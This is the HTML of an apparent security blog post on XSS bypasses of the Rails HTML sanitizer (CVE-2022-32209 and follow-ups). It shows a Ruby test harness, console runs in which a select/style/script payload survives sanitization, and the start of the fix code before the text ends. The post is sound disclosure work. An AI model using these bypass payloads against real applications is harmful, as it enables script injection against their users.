<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta name="generator" content="Hugo 0.92.2" />
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>A Tale of Two XSS in the Rails HTML Sanitizer | text/plain</title>
    <meta name="description" content="Short write-up on CVE-2022-23519 and CVE-2022-23520, two XSS vulnerabilities in the Rails HTML sanitizer.
There are some explanations of the vulnerabilities, the though process and code snippets used for fuzzing.
">
    <meta name="keywords" content="CVE, Rails, XSS, CVE-2022-23519, CVE-2022-23520">
    
    
    
    
    

  <meta name="author" content="Dominic Breuker">


    <meta property="og:title" content="A Tale of Two XSS in the Rails HTML Sanitizer" />
<meta property="og:description" content="Short write-up on CVE-2022-23519 and CVE-2022-23520, two XSS vulnerabilities in the Rails HTML sanitizer.
There are some explanations of the vulnerabilities, the though process and code snippets used for fuzzing.
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://dominicbreuker.com/post/a_tale_of_two_xss_in_rails_html_sanitizer/" /><meta property="og:image" content="https://dominicbreuker.com/img/avatar.png"/><meta property="article:section" content="post" />
<meta property="article:published_time" content="2022-12-20T00:00:00+00:00" />
<meta property="article:modified_time" content="2022-12-20T00:00:00+00:00" />


    <meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://dominicbreuker.com/img/avatar.png"/>

<meta name="twitter:title" content="A Tale of Two XSS in the Rails HTML Sanitizer"/>
<meta name="twitter:description" content="Short write-up on CVE-2022-23519 and CVE-2022-23520, two XSS vulnerabilities in the Rails HTML sanitizer.
There are some explanations of the vulnerabilities, the though process and code snippets used for fuzzing.
"/>

    



  <meta property="og:image" content="img/avatar.png">


    <meta name="theme-color" content="#000">

    
    
    
    
    <link rel="canonical" href="https://dominicbreuker.com/post/a_tale_of_two_xss_in_rails_html_sanitizer/">
    
    
    <link rel="icon" sizes="any" href="/img/favicon.ico">

    <style>
  html{font-size:12px}*{box-sizing:border-box;text-rendering:geometricPrecision}body{font-size:1rem;line-height:1.5rem;margin:0;font-family:Menlo,Monaco,Lucida Console,Liberation Mono,DejaVu Sans Mono,Bitstream Vera Sans Mono,Courier New,monospace,serif;word-wrap:break-word}h1,h2,h3,h4,h5,h6{line-height:1.3em}fieldset{border:none;padding:0;margin:0}pre{padding:2rem;margin:1.75rem 0;background-color:#fff;border:1px solid #ccc;overflow:auto}code[class*=language-],pre[class*=language-],pre code{font-weight:100;text-shadow:none;margin:1.75rem 0}a{cursor:pointer;color:#ff2e88;text-decoration:none;border-bottom:1px solid #ff2e88}a:hover{background-color:#ff2e88;color:#fff}.grid{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap}.grid.\-top{-ms-flex-align:start;-ms-grid-row-align:flex-start;align-items:flex-start}.grid.\-middle{-ms-flex-align:center;-ms-grid-row-align:center;align-items:center}.grid.\-bottom{-ms-flex-align:end;-ms-grid-row-align:flex-end;align-items:flex-end}.grid.\-stretch{-ms-flex-align:stretch;-ms-grid-row-align:stretch;align-items:stretch}.grid.\-baseline{-ms-flex-align:baseline;-ms-grid-row-align:baseline;align-items:baseline}.grid.\-left{-ms-flex-pack:start;justify-content:flex-start}.grid.\-center{-ms-flex-pack:center;justify-content:center}.grid.\-right{-ms-flex-pack:end;justify-content:flex-end}.grid.\-between{-ms-flex-pack:justify;justify-content:space-between}.grid.\-around{-ms-flex-pack:distribute;justify-content:space-around}.cell{-ms-flex:1;flex:1;box-sizing:border-box}@media screen and (min-width:768px){.cell.\-1of12{-ms-flex:0 0 8.33333%;flex:0 0 8.33333%}.cell.\-2of12{-ms-flex:0 0 16.66667%;flex:0 0 16.66667%}.cell.\-3of12{-ms-flex:0 0 25%;flex:0 0 25%}.cell.\-4of12{-ms-flex:0 0 33.33333%;flex:0 0 33.33333%}.cell.\-5of12{-ms-flex:0 0 41.66667%;flex:0 0 41.66667%}.cell.\-6of12{-ms-flex:0 0 50%;flex:0 0 50%}.cell.\-7of12{-ms-flex:0 0 58.33333%;flex:0 0 58.33333%}.cell.\-8of12{-ms-flex:0 0 66.66667%;flex:0 0 66.66667%}.cell.\-9of12{-ms-flex:0 0 75%;flex:0 0 75%}.cell.\-10of12{-ms-flex:0 0 83.33333%;flex:0 0 83.33333%}.cell.\-11of12{-ms-flex:0 0 91.66667%;flex:0 0 91.66667%}}@media screen and (max-width:768px){.grid{-ms-flex-direction:column;flex-direction:column}.cell{-ms-flex:0 0 auto;flex:0 0 auto}}.hack,.hack blockquote,.hack code,.hack em,.hack h1,.hack h2,.hack h3,.hack h4,.hack h5,.hack h6,.hack strong{font-size:1rem;font-style:normal;font-family:Menlo,Monaco,Lucida Console,Liberation Mono,DejaVu Sans Mono,Bitstream Vera Sans Mono,Courier New,monospace,serif}.hack blockquote,.hack code,.hack em,.hack strong{line-height:20px}.hack blockquote,.hack code,.hack footer,.hack h1,.hack h2,.hack h3,.hack h4,.hack h5,.hack h6,.hack header,.hack li,.hack ol,.hack p,.hack section,.hack ul{float:none;margin:0;padding:0}.hack blockquote,.hack h1,.hack ol,.hack p,.hack ul{margin-top:20px;margin-bottom:20px}.hack h1{position:relative;display:inline-block;display:table-cell;padding:20px 0 30px;margin:0;overflow:hidden}.hack h1:after{content:"====================================================================================================";position:absolute;bottom:10px;left:0}.hack h1+*{margin-top:0}.hack h2,.hack h3,.hack h4,.hack h5,.hack h6{position:relative;margin-bottom:1.75rem}.hack h2:before,.hack h3:before,.hack h4:before,.hack h5:before,.hack h6:before{display:inline}.hack h2:before{content:"## "}.hack h3:before{content:"### "}.hack h4:before{content:"#### "}.hack h5:before{content:"##### "}.hack h6:before{content:"###### "}.hack li{position:relative;display:block;padding-left:20px}.hack li:after{position:absolute;top:0;left:0}.hack ul>li:after{content:"-"}.hack ol{counter-reset:a}.hack ol>li:after{content:counter(a) ".";counter-increment:a}.hack blockquote{position:relative;padding-left:17px;padding-left:2ch;overflow:hidden}.hack blockquote:after{content:">\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>";white-space:pre;position:absolute;top:0;left:0;line-height:20px}.hack em:after,.hack em:before{content:"*";display:inline}.hack pre code:after,.hack pre code:before{content:''}.hack code{font-weight:700}.hack code:after,.hack code:before{content:"`";display:inline}.hack hr{position:relative;height:20px;overflow:hidden;border:0;margin:20px 0}.hack hr:after{content:"----------------------------------------------------------------------------------------------------";position:absolute;top:0;left:0;line-height:20px;width:100%;word-wrap:break-word}@-moz-document url-prefix(){.hack h1{display:block}}.hack-ones ol>li:after{content:"1."}p{margin:0 0 1.75rem}.container{max-width:70rem}.container,.container-fluid{margin:0 auto;padding:0 1rem}.inner{padding:1rem}.inner2x{padding:2rem}.pull-left{float:left}.pull-right{float:right}.progress-bar{height:8px;opacity:.8;background-color:#ccc;margin-top:12px}.progress-bar.progress-bar-show-percent{margin-top:38px}.progress-bar-filled{background-color:gray;height:100%;transition:width .3s ease;position:relative;width:0}.progress-bar-filled:before{content:'';border:6px solid transparent;border-top-color:gray;position:absolute;top:-12px;right:-6px}.progress-bar-filled:after{color:gray;content:attr(data-filled);display:block;font-size:12px;white-space:nowrap;position:absolute;border:6px solid transparent;top:-38px;right:0;-ms-transform:translateX(50%);transform:translateX(50%)}table{width:100%;border-collapse:collapse;margin:1.75rem 0;color:#778087}table td,table th{vertical-align:top;border:1px solid #ccc;line-height:15px;padding:10px}table thead th{font-size:10px}table tbody td:first-child{font-weight:700;color:#333}.form{width:30rem}.form-group{margin-bottom:1.75rem;overflow:auto}.form-group label{border-bottom:2px solid #ccc;color:#333;width:10rem;display:inline-block;height:38px;line-height:38px;padding:0;float:left;position:relative}.form-group.form-success label{color:#4caf50!important;border-color:#4caf50!important}.form-group.form-warning label{color:#ff9800!important;border-color:#ff9800!important}.form-group.form-error label{color:#f44336!important;border-color:#f44336!important}.form-control{outline:none;border:none;border-bottom:2px solid #ccc;padding:.5rem 0;width:20rem;height:38px;background-color:transparent}.form-control:focus{border-color:#555}.form-group.form-textarea label:after{position:absolute;content:'';width:2px;background-color:#fff;right:-2px;top:0;bottom:0}textarea.form-control{height:auto;resize:none;padding:1rem 0;border-bottom:2px solid #ccc;border-left:2px solid #ccc;padding:.5rem}select.form-control{border-radius:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none}.help-block{color:#999;margin-top:.5rem}.form-actions{margin-bottom:1.75rem}.btn{display:-ms-inline-flexbox;display:inline-flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;cursor:pointer;outline:none;padding:.65rem 2rem;font-size:1rem;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;position:relative;z-index:1}.btn:active{box-shadow:inset 0 1px 3px rgba(0,0,0,.12)}.btn.btn-ghost{border-color:#757575;color:#757575;background-color:transparent}.btn.btn-ghost:focus,.btn.btn-ghost:hover{border-color:#424242;color:#424242;z-index:2}.btn.btn-ghost:hover{background-color:transparent}.btn-block{width:100%;display:-ms-flexbox;display:flex}.btn-default{color:#fff;background-color:#e0e0e0;border:1px solid #e0e0e0;color:#333}.btn-default:focus:not(.btn-ghost),.btn-default:hover{background-color:#dcdcdc;border-color:#dcdcdc}.btn-success{color:#fff;background-color:#4caf50;border:1px solid #4caf50}.btn-success:focus:not(.btn-ghost),.btn-success:hover{background-color:#43a047;border-color:#43a047}.btn-success.btn-ghost{border-color:#4caf50;color:#4caf50}.btn-success.btn-ghost:focus,.btn-success.btn-ghost:hover{border-color:#388e3c;color:#388e3c;z-index:2}.btn-error{color:#fff;background-color:#f44336;border:1px solid #f44336}.btn-error:focus:not(.btn-ghost),.btn-error:hover{background-color:#e53935;border-color:#e53935}.btn-error.btn-ghost{border-color:#f44336;color:#f44336}.btn-error.btn-ghost:focus,.btn-error.btn-ghost:hover{border-color:#d32f2f;color:#d32f2f;z-index:2}.btn-warning{color:#fff;background-color:#ff9800;border:1px solid #ff9800}.btn-warning:focus:not(.btn-ghost),.btn-warning:hover{background-color:#fb8c00;border-color:#fb8c00}.btn-warning.btn-ghost{border-color:#ff9800;color:#ff9800}.btn-warning.btn-ghost:focus,.btn-warning.btn-ghost:hover{border-color:#f57c00;color:#f57c00;z-index:2}.btn-info{color:#fff;background-color:#00bcd4;border:1px solid #00bcd4}.btn-info:focus:not(.btn-ghost),.btn-info:hover{background-color:#00acc1;border-color:#00acc1}.btn-info.btn-ghost{border-color:#00bcd4;color:#00bcd4}.btn-info.btn-ghost:focus,.btn-info.btn-ghost:hover{border-color:#0097a7;color:#0097a7;z-index:2}.btn-primary{color:#fff;background-color:#2196f3;border:1px solid #2196f3}.btn-primary:focus:not(.btn-ghost),.btn-primary:hover{background-color:#1e88e5;border-color:#1e88e5}.btn-primary.btn-ghost{border-color:#2196f3;color:#2196f3}.btn-primary.btn-ghost:focus,.btn-primary.btn-ghost:hover{border-color:#1976d2;color:#1976d2;z-index:2}.btn-group{overflow:auto}.btn-group .btn{float:left}.btn-group .btn-ghost:not(:first-child){margin-left:-1px}.card{border:1px solid #ccc}.card .card-header{color:#333;text-align:center;background-color:#ddd;padding:.5rem 0}.alert{color:#ccc;padding:1rem;border:1px solid #ccc;margin-bottom:1.75rem}.alert-success{color:#4caf50;border-color:#4caf50}.alert-error{color:#f44336;border-color:#f44336}.alert-info{color:#00bcd4;border-color:#00bcd4}.alert-warning{color:#ff9800;border-color:#ff9800}.media:not(:last-child){margin-bottom:1.25rem}.media-left{padding-right:1rem}.media-left,.media-right{display:table-cell;vertical-align:top}.media-right{padding-left:1rem}.media-body{display:table-cell;vertical-align:top}.media-heading{font-size:1.16667rem;font-weight:700}.media-content{margin-top:.3rem}.avatarholder,.placeholder{background-color:#f0f0f0;text-align:center;color:#b9b9b9;font-size:1rem;border:1px solid #f0f0f0}.avatarholder{width:48px;height:48px;line-height:46px;font-size:2rem;background-size:cover;background-position:50%;background-repeat:no-repeat}.avatarholder.rounded{border-radius:33px}.loading{display:inline-block;content:'&nbsp;';height:20px;width:20px;margin:0 .5rem;animation:a .6s infinite linear;border:2px solid #e91e63;border-right-color:transparent;border-radius:50%}.btn .loading{margin-bottom:0;width:14px;height:14px}.btn div.loading{float:left}.alert .loading{margin-bottom:-5px}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}.menu{width:100%}.menu .menu-item{display:block;color:#616161;border-color:#616161}.menu .menu-item.active,.menu .menu-item:hover{color:#000;border-color:#000;background-color:transparent}@media screen and (max-width:768px){.form-group label{display:block;border-bottom:none;width:100%}.form-group.form-textarea label:after{display:none}.form-control{width:100%}textarea.form-control{border-left:none;padding:.5rem 0}pre::-webkit-scrollbar{height:3px}}@media screen and (max-width:480px){.form{width:100%}}.dark{color:#ccc}.dark,.dark pre{background-color:#000}.dark pre{padding:0;border:none}.dark pre code{color:#00bcd4}.dark h1 a,.dark h2 a,.dark h3 a,.dark h4 a,.dark h5 a{color:#ccc}.dark code,.dark strong{color:#fff}.dark code{font-weight:100}.dark table{color:#ccc}.dark table td,.dark table th{border-color:#444}.dark table tbody td:first-child{color:#fff}.dark .form-group label{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .form-group.form-textarea label:after{background-color:#000}.dark .form-control{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .form-control:focus{border-color:#ccc;color:#ccc}.dark textarea.form-control{color:#ccc}.dark .card{border-color:rgba(95,95,95,.78)}.dark .card .card-header{background-color:transparent;color:#ccc;border-bottom:1px solid rgba(95,95,95,.78)}.dark .btn.btn-ghost.btn-default{border-color:#ababab;color:#ababab}.dark .btn.btn-ghost.btn-default:focus,.dark .btn.btn-ghost.btn-default:hover{border-color:#9c9c9c;color:#9c9c9c;z-index:1}.dark .btn.btn-ghost.btn-default:focus,.dark .btn.btn-ghost.btn-default:hover{border-color:#e0e0e0;color:#e0e0e0}.dark .btn.btn-ghost.btn-primary:focus,.dark .btn.btn-ghost.btn-primary:hover{border-color:#64b5f6;color:#64b5f6}.dark .btn.btn-ghost.btn-success:focus,.dark .btn.btn-ghost.btn-success:hover{border-color:#81c784;color:#81c784}.dark .btn.btn-ghost.btn-info:focus,.dark .btn.btn-ghost.btn-info:hover{border-color:#4dd0e1;color:#4dd0e1}.dark .btn.btn-ghost.btn-error:focus,.dark .btn.btn-ghost.btn-error:hover{border-color:#e57373;color:#e57373}.dark .btn.btn-ghost.btn-warning:focus,.dark .btn.btn-ghost.btn-warning:hover{border-color:#ffb74d;color:#ffb74d}.dark .avatarholder,.dark .placeholder{background-color:transparent;border-color:#333}.dark .menu .menu-item{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .menu .menu-item.active,.dark .menu .menu-item:hover{color:#fff;border-color:#ccc}
  :root {
  --screen-size-small: 30em; /* breakpoint reference only */
}
@keyframes intro {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
.muted {
  color: rgba(255, 255, 255, 0.5);
}
.readmore {
  margin-bottom: 2.2em;
}
.responsive-iframe {
  position: relative;
  padding-bottom: 56.25%; /* 16:9 */
  padding-top: 25px;
  height: 0;
}
.responsive-iframe iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
iframe {
  border: 0;
}
main, footer {
  animation: intro 0.3s both;
  animation-delay: 0.15s;
}
footer time[datetime$="M"]:before {
  content: "\2013\0020";
}
@media only screen
  and ( max-width: 30em ) {
  footer time[datetime$="M"] {
    display: none;
  }
}
blockquote cite {
  display: block;
}
blockquote cite::before {
   content: "\2014";
}
:target {
  color: #fff;
}
/* hack.css overrides and enhancements */
.hack li ul {
  margin: 0;
}
.main {
  padding: 20px 10px;
}
nav a.active {
  background-color: #ff2e88;
  color: #fff;
}
a[itemprop="url"] {
  color: #ff9800;
}
a[itemprop="url"]:hover {
  color: #fff;
}
a[href*="://"]::after,
a[rel*="external"] {
  content: " " url("data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20class='i-external'%20viewBox='0%200%2032%2032'%20width='14'%20height='14'%20fill='none'%20stroke='%23ff9800'%20stroke-linecap='round'%20stroke-linejoin='round'%20stroke-width='9.38%'%3E%3Cpath%20d='M14%209%20L3%209%203%2029%2023%2029%2023%2018%20M18%204%20L28%204%2028%2014%20M28%204%20L14%2018'/%3E%3C/svg%3E");
}
figure a[href*="://"]::after,
figure a[rel*="external"] {
  content: "";
}
html {
  font-size: 13px;
}
.hack pre {
  font-size: 17px;
}
article [itemprop="description"] {
  margin-bottom: 20px;
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  html {
    font-size: 1em;
  }
  .container {
    max-width: 50rem;
  }
}

  nav a.active {
  background-color: #33cc33; /*ff2e88*/
  color: #fff;
}
a[itemprop="url"] {
  color: #339933; /*ff9800*/
}
a[itemprop="url"]:hover {
  color: #fff;
  background-color: #33cc33; /*ff2e88*/
}

.dark pre code {
  color: #248f24;
}

.dark code {
  color: #248f24;
}

a {
  color: #339933; /*ff9800*/
  border-bottom: 1px solid #33cc33;
}

a:hover {
  color: #fff;
  background-color: #33cc33; /*ff2e88*/
}

/* custom styles */
figure {
  margin-left: auto;
  margin-right: auto;
  text-align: center;
}
figure img {
  max-width: 100%;
}
figure a {
  border-bottom: none !important;
}
figure a:hover {
  background-color: inherit !important;
}

input:invalid {
  border-bottom: 2px solid #f44336 !important;
}

input:valid {
  border-bottom: 2px solid #ccc;
}

</style>

    
    
      <script async src="/js/lazysizes.min.js"></script>
    
    
      <script async src="/js/bpgdec8a.js"></script>
      <script async src="/js/bpgdec8.js"></script>
      <script async src="/js/bpgdec.js"></script>
    
  </head>
  
  <body class="hack dark main container">
    <header>
  
  <nav itemscope itemtype="http://schema.org/SiteNavigationElement">
    
    
      <a itemprop="url" class="" href="/"><span itemprop="name">Home</span></a>
    
      <a itemprop="url" class="" href="/post/"><span itemprop="name">Post</span></a>
    
      <a itemprop="url" class="" href="/encoders/"><span itemprop="name">Encoders</span></a>
    
      <a itemprop="url" class="" href="/about/"><span itemprop="name">About</span></a>
    
  </nav>


</header>
    <main>
  <article itemscope itemtype="http://schema.org/BlogPosting">
    <meta itemprop="name" content="A Tale of Two XSS in the Rails HTML Sanitizer">
<meta itemprop="description" content="Short write-up on CVE-2022-23519 and CVE-2022-23520, two XSS vulnerabilities in the Rails HTML sanitizer.
There are some explanations of the vulnerabilities, the though process and code snippets used for fuzzing.
"><meta itemprop="datePublished" content="2022-12-20T00:00:00+00:00" />
<meta itemprop="dateModified" content="2022-12-20T00:00:00+00:00" />
<meta itemprop="wordCount" content="2355"><meta itemprop="image" content="https://dominicbreuker.com/img/avatar.png"/>
<meta itemprop="keywords" content="CVE,Rails,XSS,CVE-2022-23519,CVE-2022-23520," />
    <script async src="/js/baffle.js"></script>
    <header>
      <h1 class="baffle" itemprop="headline">A Tale of Two XSS in the Rails HTML Sanitizer</h1>
      <p class="muted">
        <svg style="margin-bottom:-3px" class="i-clock" viewBox="0 0 32 32" width="16" height="16" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="6.25%">
  <circle cx="16" cy="16" r="14" />
  <path d="M16 8 L16 16 20 20" />
</svg>
<span>12 minute read</span>
<svg style="margin-bottom: -3px" class="i-edit" viewBox="0 0 32 32" width="16" height="16" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="6.25%">
  <path d="M30 7 L25 2 5 22 3 29 10 27 Z M21 6 L26 11 Z M5 22 L10 27 Z" />
</svg>

  Published: <time datetime="2022-12-20T00:00:00&#43;00:00">20 Dec, 2022</time>


      </p>
    </header>
    
      <blockquote itemprop="description">Short write-up on CVE-2022-23519 and CVE-2022-23520, two XSS vulnerabilities in the Rails HTML sanitizer.
There are some explanations of the vulnerabilities, the though process and code snippets used for fuzzing.
</blockquote>
    
    
  <details>
    <summary>Table of Contents</summary>
    <nav id="TableOfContents">
  <ul>
    <li><a href="#cve-2022-32209-xss-when-select-and-style-tags-are-allowed">CVE-2022-32209: XSS when select and style tags are allowed</a></li>
    <li><a href="#cve-2022-23520-incomplete-fix-for-cve-2022-32209">CVE-2022-23520: Incomplete fix for CVE-2022-32209</a></li>
    <li><a href="#cve-2022-23519-more-xss-for-mathstyle-and-svgstyle">CVE-2022-23519: More XSS for math+style and svg+style</a></li>
    <li><a href="#the-underlying-problem-and-its-current-fix">The underlying problem and its current fix</a></li>
  </ul>
</nav>
  </details>
  <script>
    const el = document.querySelector('details summary')
    el.onclick = () => {
      (function(l,o,a,d,e,r){e=o.createElement(a),r=o.getElementsByTagName(a)[0];e.async=1;e.src=d;r.parentNode.insertBefore(e,r)})(window,document,'script','/js/smoothscroll.js');
      el.onclick = null
    }
    document.querySelectorAll('#TableOfContents a').forEach(link => {
      link.addEventListener('click', () => {
        document.querySelector(
          link.href.slice(link.href.indexOf('#'))
        ).scrollIntoView({ behavior: 'smooth' })
      })
    })
  </script>


    <div itemprop="articleBody">
      <p>A while ago I was writing an application based on the Rails framework which returned sanitized user input.
Its purpose was to build a PoC for an XSS vulnerability in the Rails HTML sanitizer
(CVE-2022-32209, which appeared in June 2022).
The following is a short write-up of that endeavour and how it turned into the discovery of two additional CVEs.</p>
<p>I start with a discussion of the original CVE-2022-32209,
proceed with an investigation of the fix and how it turned out to be incomplete (CVE-2022-23520),
explain how that motivated additional fuzzing which uncovered additional working attack payloads (CVE-2022-23519)
and conclude with a brief outline of the fix
(entirely designed and implemented by <a href="https://github.com/flavorjones">flavorjones</a>).</p>
<h2 id="cve-2022-32209-xss-when-select-and-style-tags-are-allowed">CVE-2022-32209: XSS when select and style tags are allowed</h2>
<p>The Rails HTML sanitizer gives Rails developers the ability to accept user input that contains HTML and return that
HTML to (other) users, but without introducing XSS.
It does that by allowing only selected sets of HTML tags and attributes and scrubbing the rest.
As a developer, you can modify these allow lists.
Of course, you should not do anything stupid like adding <code>script</code> to the allow list of HTML tags.
Beyond that though, the job of the sanitizer is to work with any reasonable allow list developers come up with.</p>
<p>The starting point for CVE-2022-32209 is this <a href="https://hackerone.com/reports/1530898">HackerOne report</a>.
It describes how the Rails HTML sanitizer does not work properly when both the <code>style</code> and <code>select</code> tags are allowed.</p>
<p>Lets write a small script to see what happens.
I&rsquo;ve stored it in a file <code>sanitize-1-4-2.rb</code> to emphasize that the version of the Rails sanitizer is pinned to <code>1.4.2</code>.
This is the code (heavily inspired by flavorjones, the author of the sanitizer,
see <a href="https://github.com/flavorjones/loofah/blob/main/docs/2022-10-decision-on-cdata-nodes.md#2017-10-10-loofah-vulnerability">here</a>):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#75715e">#! /usr/bin/env ruby</span>

require <span style="color:#e6db74">&#34;bundler/inline&#34;</span>
require <span style="color:#e6db74">&#39;bundler&#39;</span>

<span style="color:#66d9ef">Bundler</span><span style="color:#f92672">.</span>configure_gem_home_and_path <span style="color:#e6db74">&#34;.cache/bundler&#34;</span>
gemfile <span style="color:#66d9ef">do</span>
  source <span style="color:#e6db74">&#34;https://rubygems.org&#34;</span>
  gem <span style="color:#e6db74">&#34;rails-html-sanitizer&#34;</span>, <span style="color:#e6db74">&#34;=1.4.2&#34;</span>
<span style="color:#66d9ef">end</span>

require <span style="color:#e6db74">&#34;rails-html-sanitizer&#34;</span>

<span style="color:#66d9ef">if</span> <span style="color:#66d9ef">ARGV</span><span style="color:#f92672">.</span>length <span style="color:#f92672">!=</span> <span style="color:#ae81ff">2</span>
  puts <span style="color:#e6db74">&#34;Pass 2 arguments:&#34;</span>
  puts <span style="color:#e6db74">&#34; 1st the string to sanitize&#34;</span>
  puts <span style="color:#e6db74">&#34; 2nd the tags you want to whitelist&#34;</span>
  exit
<span style="color:#66d9ef">end</span>

input <span style="color:#f92672">=</span> <span style="color:#66d9ef">ARGV</span><span style="color:#f92672">[</span><span style="color:#ae81ff">0</span><span style="color:#f92672">]</span>
tags <span style="color:#f92672">=</span> <span style="color:#66d9ef">ARGV</span><span style="color:#f92672">[</span><span style="color:#ae81ff">1</span><span style="color:#f92672">].</span>split(<span style="color:#e6db74">&#39; &#39;</span>)

puts <span style="color:#e6db74">&#34;Current Version  : &#34;</span> <span style="color:#f92672">+</span> <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Sanitizer</span><span style="color:#f92672">::</span><span style="color:#66d9ef">VERSION</span>
puts <span style="color:#e6db74">&#34;Input string     : &#34;</span> <span style="color:#f92672">+</span> input
puts <span style="color:#e6db74">&#34;Allowed tags     : &#34;</span> <span style="color:#f92672">+</span> tags<span style="color:#f92672">.</span>join(<span style="color:#e6db74">&#39; &#39;</span>)

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">sanitize</span>(input, tags)
  <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">SafeListSanitizer</span><span style="color:#f92672">.</span>new<span style="color:#f92672">.</span>sanitize(input, <span style="color:#e6db74">tags</span>: tags)
<span style="color:#66d9ef">end</span>

puts <span style="color:#e6db74">&#34;Output           : &#34;</span> <span style="color:#f92672">+</span> sanitize(input, tags)
</code></pre></div><p>The script accepts two arguments: first a string to sanitize and second a list of allowed HTML tags.
Then it will print the sanitized string to your console.
Run it and you see that the sanitizer does a good job of sanitizing HTML:</p>
<pre tabindex="0"><code>user@notebook:~$ ./sanitize-1-4-2.rb '&lt;div&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/div&gt; &lt;img src=x onerror=alert()&gt;' 'div img'
Current Version  : 1.4.2
Input string     : &lt;div&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/div&gt; &lt;img src=x onerror=alert()&gt;
Allowed tags     : div img
Output           : &lt;div&gt;alert()&lt;/div&gt; &lt;img src=&quot;x&quot;&gt;
</code></pre><p>We allowed both <code>div</code> and <code>img</code> as tags and the sanitizer removed all other dangerous tags and attributes from the HTML string.
The <code>script</code> tag is gone and the <code>onerror</code> attribute of the <code>img</code> tag is removed too.</p>
<p>However, run it with the following input string while allowing tags <code>select</code> and <code>style</code> and surprisingly, the <code>script</code> tag
in the input string remains exactly where it is:</p>
<pre tabindex="0"><code>user@notebook:~$ ./sanitize-1-4-2.rb '&lt;select&gt;&lt;style&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/style&gt;&lt;/select&gt;' 'select style'
Current Version  : 1.4.2
Input string     : &lt;select&gt;&lt;style&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/style&gt;&lt;/select&gt;
Allowed tags     : select style
Output           : &lt;select&gt;&lt;style&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/style&gt;&lt;/select&gt;
</code></pre><p>The original <a href="https://hackerone.com/reports/1530898">HackerOne report</a> used a slightly different, malformed string as input
but it basically worked with the simple string above, as we&rsquo;ve just seen.
Version <code>1.4.3</code> rolled out a fix for the vulnerability, so everything should be fine when using that version.</p>
<h2 id="cve-2022-23520-incomplete-fix-for-cve-2022-32209">CVE-2022-23520: Incomplete fix for CVE-2022-32209</h2>
<p>Now one day I was building a small application in Rails and wanted to update my sanitizer to fix CVE-2022-32209.
A small change in the Gemfile was all it took.
Then I&rsquo;ve testet the payload shown above to make sure the Gem was actually updated.
To my surprise though, the application was still vulnerable.
First I convinced myself that the problem was not me being too stupid to update a Gem,
then I went off investigating what was going on here.</p>
<p>Code for the sanitizer lives in its own repository at <a href="https://github.com/rails/rails-html-sanitizer">github.com/rails/rails-html-sanitizer</a>.
Looking at the recent commits, I found <a href="https://github.com/rails/rails-html-sanitizer/commit/45a5c10fed3d9aa141594c80afa06d748fa0967d">this one</a>,
which seemed to be the fix for CVE-2022-32209.
Basically, all it does is define a new private method <code>remove_safelist_tag_combinations</code> on the sanitizer,
which removes <code>style</code> from the list of allowed tags if <code>select</code> is in there too.
This new method is used within another method <code>allowed_tags</code>, whose responsibility is to return
the list of allowed tags and which is used within the <code>sanitize</code> method.
See the relevant code below:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#66d9ef">module</span> Rails
  <span style="color:#66d9ef">module</span> Html
    <span style="color:#66d9ef">class</span> <span style="color:#a6e22e">SafeListSanitizer</span> <span style="color:#f92672">&lt;</span> <span style="color:#66d9ef">Sanitizer</span>
    <span style="color:#f92672">...</span>

      <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">sanitize</span>(html, options <span style="color:#f92672">=</span> {})
        <span style="color:#f92672">...</span>
        <span style="color:#66d9ef">elsif</span> allowed_tags(options) <span style="color:#f92672">||</span> allowed_attributes(options)
          @permit_scrubber<span style="color:#f92672">.</span>tags <span style="color:#f92672">=</span> allowed_tags(options)
        <span style="color:#f92672">...</span>
      <span style="color:#66d9ef">end</span>
      <span style="color:#f92672">...</span>

      <span style="color:#66d9ef">private</span>

      <span style="color:#f92672">...</span>

      <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">remove_safelist_tag_combinations</span>(tags)
